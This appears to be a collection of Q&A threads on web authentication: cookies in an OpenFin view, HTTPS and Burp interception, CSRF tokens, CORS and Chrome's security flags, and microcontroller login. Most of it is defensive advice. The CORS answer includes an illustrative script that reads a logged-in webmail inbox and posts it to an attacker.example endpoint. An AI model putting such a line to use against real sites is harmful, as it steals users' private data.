OpenFin .NET Adapter HTTPS authentication

I am trying to build a WinForms app with OpenFin that has HTTPS authentication requirements.
I was able to bring up EmbeddedView URL sites that don't require login information.
To enable SSO/login authentication and authorization, I have tried passing cookie information as custom request headers by adding them to the request:

var headers = new Dictionary<object, object>();

I add the cookies to this dictionary and set the "Set-Cookie" header, then do the following:

_appOptions.MainWindowOptions.CustomRequestHeaders.Add(headers);

Subsequently, I initialize the EmbeddedView:

embeddedView.Initialize(_runtimeOptions, _appOptions);
This, however, doesn't send any cookies to the app server. Can someone confirm whether this is the right approach? How can I send cookies/authentication as part of requests for OpenFin forms/windows?
Thanks

Related

Credentials in a request body over HTTPS

Hey, so I am new to pentesting, and I learnt that HTTPS encrypts traffic so that attackers cannot decipher credentials passed in a request (for example, on a login page) or read the traffic properly. I was practicing with both GET and POST requests against a login page over HTTPS, and in both cases the credentials are present when I intercept the requests with Burp Suite: in GET the parameters are in the URL, and in POST they are in the body. Can someone explain how the privacy of the credentials is maintained if they appear in plaintext in the request? Won't everyone be able to read them?
Testing:
Submitted credentials through a login page application over HTTPS.
Passed them through both GET and POST methods.
Result:
Able to see the credentials in both types of calls in the intercepted request.
Burp Suite sees them because it runs as a proxy for the browser: the browser trusts Burp's CA certificate, so Burp can decrypt the TLS traffic. Over HTTPS, both GET and POST parameters are encrypted once they leave the browser.
Note that the URL as such doesn't leave the browser (or, more generally, the user agent). A connection is made using the hostname and port (those will still be visible to a man-in-the-middle), but the GET parameters are sent over HTTPS once the connection is established.
The reason people say not to pass sensitive information in GET requests is that the URL may end up in log files or the browser history, be seen over people's shoulders, and so on. GET requests can also be cached.
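As a rough illustration of where the credentials travel (the endpoint and field names here are made up), both requests below are equally encrypted by TLS; only the GET variant leaks the credentials into the URL:

// Hypothetical login endpoint; both calls are fully encrypted on the wire.
async function login(user: string, pass: string): Promise<void> {
  // GET: credentials become part of the URL, so they can end up in
  // server access logs, browser history, and caches.
  await fetch(`https://app.example.com/login?user=${encodeURIComponent(user)}&pass=${encodeURIComponent(pass)}`);

  // POST: credentials travel in the request body; the URL stays clean.
  await fetch("https://app.example.com/login", {
    method: "POST",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: new URLSearchParams({ user, pass }),
  });
}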

CSRF implementation in a MERN stack

Below is the file structure of my MERN project:
|- Project
   |- client
   |- server
The client folder contains a React app.
The client runs at localhost.client.com.
The server folder contains the code for the Node.js server.
The server runs at localhost.server.com.
Whenever I make a request from the client to the server, how can I mitigate CSRF attacks, i.e. make sure that a request made to the server comes from my client and not from any other source?
Your issue might be covered in React frontend and REST API, CSRF.
There is an excellent article about CSRF and countermeasures (with Angular in mind, but it is still the same problem). TL;DR:
rely on the same-origin policy, or set the Access-Control-Allow-Origin header when needed
save an XSRF token in a secure cookie (unfortunately this usually requires an extra request). Only code from your domain can access this value.
send that token as the X-XSRF-TOKEN header value with your requests to authorize them (a minimal sketch follows below)
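Here is a minimal sketch of that token flow in Express (the route paths and cookie options are my own assumptions for illustration, not part of the original answer):

import crypto from "crypto";
import express from "express";
import cookieParser from "cookie-parser";

const app = express();
app.use(cookieParser());

// Extra request: the client fetches a token, which is also set as a cookie.
// The cookie must stay readable by client-side JS (no httpOnly), so that
// only code running on your domain can copy it into the header.
app.get("/csrf-token", (req, res) => {
  const token = crypto.randomBytes(32).toString("hex");
  res.cookie("XSRF-TOKEN", token, { secure: true, sameSite: "strict" });
  res.json({ token });
});

// Every state-changing request must echo the cookie value in a header.
app.post("/api/data", (req, res) => {
  if (req.headers["x-xsrf-token"] !== req.cookies["XSRF-TOKEN"]) {
    return res.status(403).send("CSRF token mismatch");
  }
  res.send("ok");
});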
To make sure only your application can use the server API, you can set the Access-Control-Allow-Origin response header as part of CORS (returned, among others, in the OPTIONS preflight response).
During development it is usually set to
Access-Control-Allow-Origin: *
For production, you specify your domain/server name:
Access-Control-Allow-Origin: localhost.client.com
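In Express that could look like the following sketch (the origin value matches the hostname from the question; the header list is illustrative):

import express from "express";

const app = express();

// Allow only the known client origin to make cross-origin calls.
app.use((req, res, next) => {
  res.setHeader("Access-Control-Allow-Origin", "http://localhost.client.com");
  res.setHeader("Access-Control-Allow-Headers", "Content-Type, X-XSRF-TOKEN");
  if (req.method === "OPTIONS") return res.sendStatus(204); // preflight
  next();
});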
To protect against spoofing of the origin, you can use (anti-)CSRF tokens. These are extra values attached to your request which authenticate it.
This value can/should be saved in a secure cookie. csurf or JSON Web Tokens might be relevant for you. In your case, CSRF tokens might require an extra request to your API to query the token.

How to distinguish between HTTP requests sent by my client application and other requests from the Internet

Suppose I have a client/server application working over HTTP. The server provides a RESTful API, and the client calls the server using regular HTTP GET requests.
The server requires no authentication. Anyone on the Internet can send a GET request to my server; that's OK. I just wonder how I can distinguish the requests from my client from other requests from the Internet.
Suppose my client sends a request X. A user records this request (including the user agent, headers, cookies, etc.) and sends it again, with wget for example. I would like to distinguish between these two requests on the server side.
There is no exact solution other than authentication. On the other hand, you do not need to implement username & password authentication for this basic requirement. You could simply define a random string for your "client" and send it to the API in a custom HTTP header, like:
GET /api/ HTTP/1.1
Host: www.backend.com
My-Custom-Token-Dude: a717sfa618e89a7a7d17dgasad
...
You could distinguish the requests by this custom header, i.e. by its presence and the validity of its value (a sketch follows below). But keep in mind that this is "security through obscurity", not a real solution.
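On the server, the check could look something like this sketch (the header name and token value are taken from the example request above):

import express from "express";

const app = express();

// Shared secret baked into the client build.
const CLIENT_TOKEN = "a717sfa618e89a7a7d17dgasad";

// Reject any request that does not carry the expected custom header.
app.use((req, res, next) => {
  if (req.headers["my-custom-token-dude"] !== CLIENT_TOKEN) {
    return res.status(403).send("Forbidden");
  }
  next();
});

app.get("/api/", (_req, res) => res.json({ ok: true }));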
You cannot know for sure if it is your application or not. Anything in the request can be made up.
But you can make sure that nobody else's web application is using your API inadvertently. For example, somebody may create a JavaScript application and point it at your REST API. The browser sends the Origin header (draft) indicating in which application the request was generated. You can use this header to filter out calls from applications that are not yours.
However, that somebody may use their own web server as a proxy to your application, allowing them to craft HTTP requests in full detail. In that case, at some point you would be able to pinpoint their IP address and block it.
But the best solution would be to add some degree of authorization. For example, the UI part can ask for authentication via login/password, or just a captcha to ensure the caller is a person, then generate a token and associate it with the user session. From that point on, calls to the API have to provide that token, otherwise you must reject them.
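A rough sketch of that token flow, with an in-memory session store (the login check itself is elided and all names are illustrative):

import crypto from "crypto";
import express from "express";

const app = express();
app.use(express.json());

const sessions = new Set<string>(); // tokens of active sessions

app.post("/login", (req, res) => {
  // ... verify login/password or a captcha here ...
  const token = crypto.randomBytes(32).toString("hex");
  sessions.add(token);
  res.json({ token });
});

app.get("/api/data", (req, res) => {
  const token = req.headers.authorization?.replace("Bearer ", "");
  if (!token || !sessions.has(token)) {
    return res.status(401).send("Unauthorized");
  }
  res.json({ ok: true });
});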

Chrome --disable-web-security: why should that be allowed?

As far as I know, 'Access-Control-Allow-Origin' is used as part of CORS to limit which hosts can request data from a given API server. This header value is set by the server as part of a response.
I happened to stumble upon a Chrome extension which says:
Allows you to request any site with AJAX from any source. Adds the 'Access-Control-Allow-Origin: *' header to responses.
Developer tool.
Summary: adds the response header rule 'Allow-Control-Allow-Origin: *'.
Hint: you can get the same behavior just by using Chrome flags [http://www.chromium.org/developers/how-tos/run-chromium-with-flags]:
chrome --disable-web-security
or
--allow-file-access-from-files --allow-file-access --allow-cross-origin-auth-prompt
So that means that from the client side I can change the response header. If I set 'Access-Control-Allow-Origin: http://api.example.com' on the server, that setting can be overwritten by the client with 'Access-Control-Allow-Origin: *'. Or maybe I don't want to support CORS, so I don't set the header at all, but this will still make it look as if I do support CORS.
If that is the case, what is the point of having my server-side setting? Isn't it redundant?
Maybe I am being too naive here and not getting the basics of it.
CORS is a security feature to protect clients from CORF, or Cross-Origin Request Forgery. It is not intended to secure servers, as a client can simply choose to ignore it.
An example of CORF would be visiting a website whose client-side code interacts with another website on your behalf: submitting data to it, or reading data that requires authentication as you, all using your active authentication sessions.
Theoretically, without the cross-origin restrictions that CORS governs, it would be possible to create a website that fetches your email from a webmail provider (provided you are logged in at the time) and posts it back to a server for malicious individuals to read.
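For illustration (all URLs here are made up), this is the kind of script such a page would run, and exactly what the browser blocks unless the webmail server explicitly opts in with an Access-Control-Allow-Origin header:

// Hypothetical attacker page script. In a normal browser the cross-origin
// read is blocked: fetch() rejects and the response body is never exposed.
fetch("https://webmail.example/inbox", { credentials: "include" })
  .then((r) => r.text())
  .then((body) =>
    fetch("https://attacker.example/steal", { method: "POST", body })
  )
  .catch(() => {
    // Blocked by the same-origin policy / missing CORS header.
  });

With --disable-web-security, that protection is gone.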
To avoid this, you shouldn't browse the web with such security features disabled. It's available to ease development, not for general browsing.

lwIP on Stellaris 32-bit microcontroller - Secure Login

I wish to use my Stellaris LM3S8962 microcontroller as a bridge between the Internet and a bunch of sensors. I will be using ZigBee nodes for communication from the sensors to the microcontroller. I have been able to use the lwIP TCP/IP stack (for the LM3S8962) to access HTML pages stored in the controller's flash.
Now I want to add a secure login system on top of this. What I basically want is that when I enter the IP of the controller in the browser, it should prompt me for a username and a password. I want to make this system as secure as possible using the lwIP TCP/IP stack.
FYI, the stack does not support PHP or any other scripting. A CGI feature (in C) is supported, but I don't know how to implement the security part. Please guide me.
There are basically two ways you could implement user authentication over HTTP on your platform:
"classic" Basic HTTP authentication (see RFC 2617 for the exact specification),
a login form, creating a session ID, and returning that to the browser, to be stored either in a cookie or in the URL.
Basic HTTP authentication works by inserting a check into your web page serving routine to see whether there is an Authorization HTTP header. If there is, you decode it (see the RFC) and check the specified username/password. If the credentials are OK, you proceed with serving the page. If the credentials are incorrect, or there is no Authorization header at all, you return a 401 status code together with a WWW-Authenticate response header; the browser will then prompt the user for the credentials. This solution is rather simple, but you get the browser's login dialog rather than a nice HTML page, and the microcontroller has to check the credentials on every page request.
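The check itself is only a few lines. Here is the logic as a sketch (shown in TypeScript for brevity; on the LM3S8962 the same steps would live in your C CGI handler, with your own base64 decoder):

// Sketch of the Basic authentication check described above.
// expectedUser/expectedPass are illustrative; they would be stored in flash.
function checkBasicAuth(
  authHeader: string | undefined,
  expectedUser: string,
  expectedPass: string
): { status: 200 } | { status: 401; headers: Record<string, string> } {
  if (authHeader?.startsWith("Basic ")) {
    // Header format: "Basic base64(username:password)"
    const decoded = Buffer.from(authHeader.slice(6), "base64").toString("utf8");
    const [user, pass] = decoded.split(":");
    if (user === expectedUser && pass === expectedPass) {
      return { status: 200 }; // proceed with serving the page
    }
  }
  // Missing or wrong credentials: 401 plus WWW-Authenticate makes the
  // browser show its login prompt.
  return {
    status: 401,
    headers: { "WWW-Authenticate": 'Basic realm="Sensor Gateway"' },
  };
}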
Authentication via a login form works by having your server maintain a list of properly authenticated user sessions (probably in memory) and checking each request against this list. Upon logging in, a unique, random ID should be generated for that session, and the session data entered into your list. The new session ID is returned to the browser, to be included in upcoming HTTP requests. You may choose to put the session ID in a browser cookie, or you can embed it in the URL as a URL parameter (?id=xxxxx). The URL parameter is embedded by sending a 302 redirection response to the browser with the new URL; if you want the cookie solution, you send the response to the login request with a Set-Cookie HTTP response header.
In the login form solution, the actual credentials (username/password) are only checked once, at login. After that, only the session ID is checked against the list of active sessions, so it has to be extracted from every request (from the URL, or from the Cookie HTTP header). You'll also have to implement some kind of session timeout, both as a security measure and to bound the size of the list of active sessions.
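The session bookkeeping could look like this sketch (again TypeScript for brevity; the names and the 10-minute timeout are my own choices, not from the original answer):

import crypto from "crypto";

const SESSION_TIMEOUT_MS = 10 * 60 * 1000; // assumed 10-minute timeout
const sessions = new Map<string, number>(); // session ID -> expiry timestamp

// Called once, after the login form credentials have been verified.
function createSession(): string {
  const id = crypto.randomBytes(16).toString("hex"); // unique, random ID
  sessions.set(id, Date.now() + SESSION_TIMEOUT_MS);
  return id; // deliver via Set-Cookie, or a 302 redirect to ...?id=<id>
}

// Called for every subsequent request, with the ID extracted from the
// Cookie header or from the URL parameter.
function isSessionValid(id: string): boolean {
  const expiry = sessions.get(id);
  if (expiry === undefined || expiry < Date.now()) {
    sessions.delete(id); // unknown or timed out: drop it
    return false;
  }
  sessions.set(id, Date.now() + SESSION_TIMEOUT_MS); // sliding timeout
  return true;
}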
Now comes the harder part: in both solutions, the username/password travels in some requests (in every request for Basic HTTP authentication, and in the login POST for the login form solution) and can be extracted from the network traffic. Likewise, the information necessary to hijack the session is present in every request in both solutions. If this is a problem (the system works on a freely accessible LAN segment, or over network links beyond your control), you'll probably need SSL to hide this sensitive data. How to get a reasonable SSL implementation for your platform is another question.
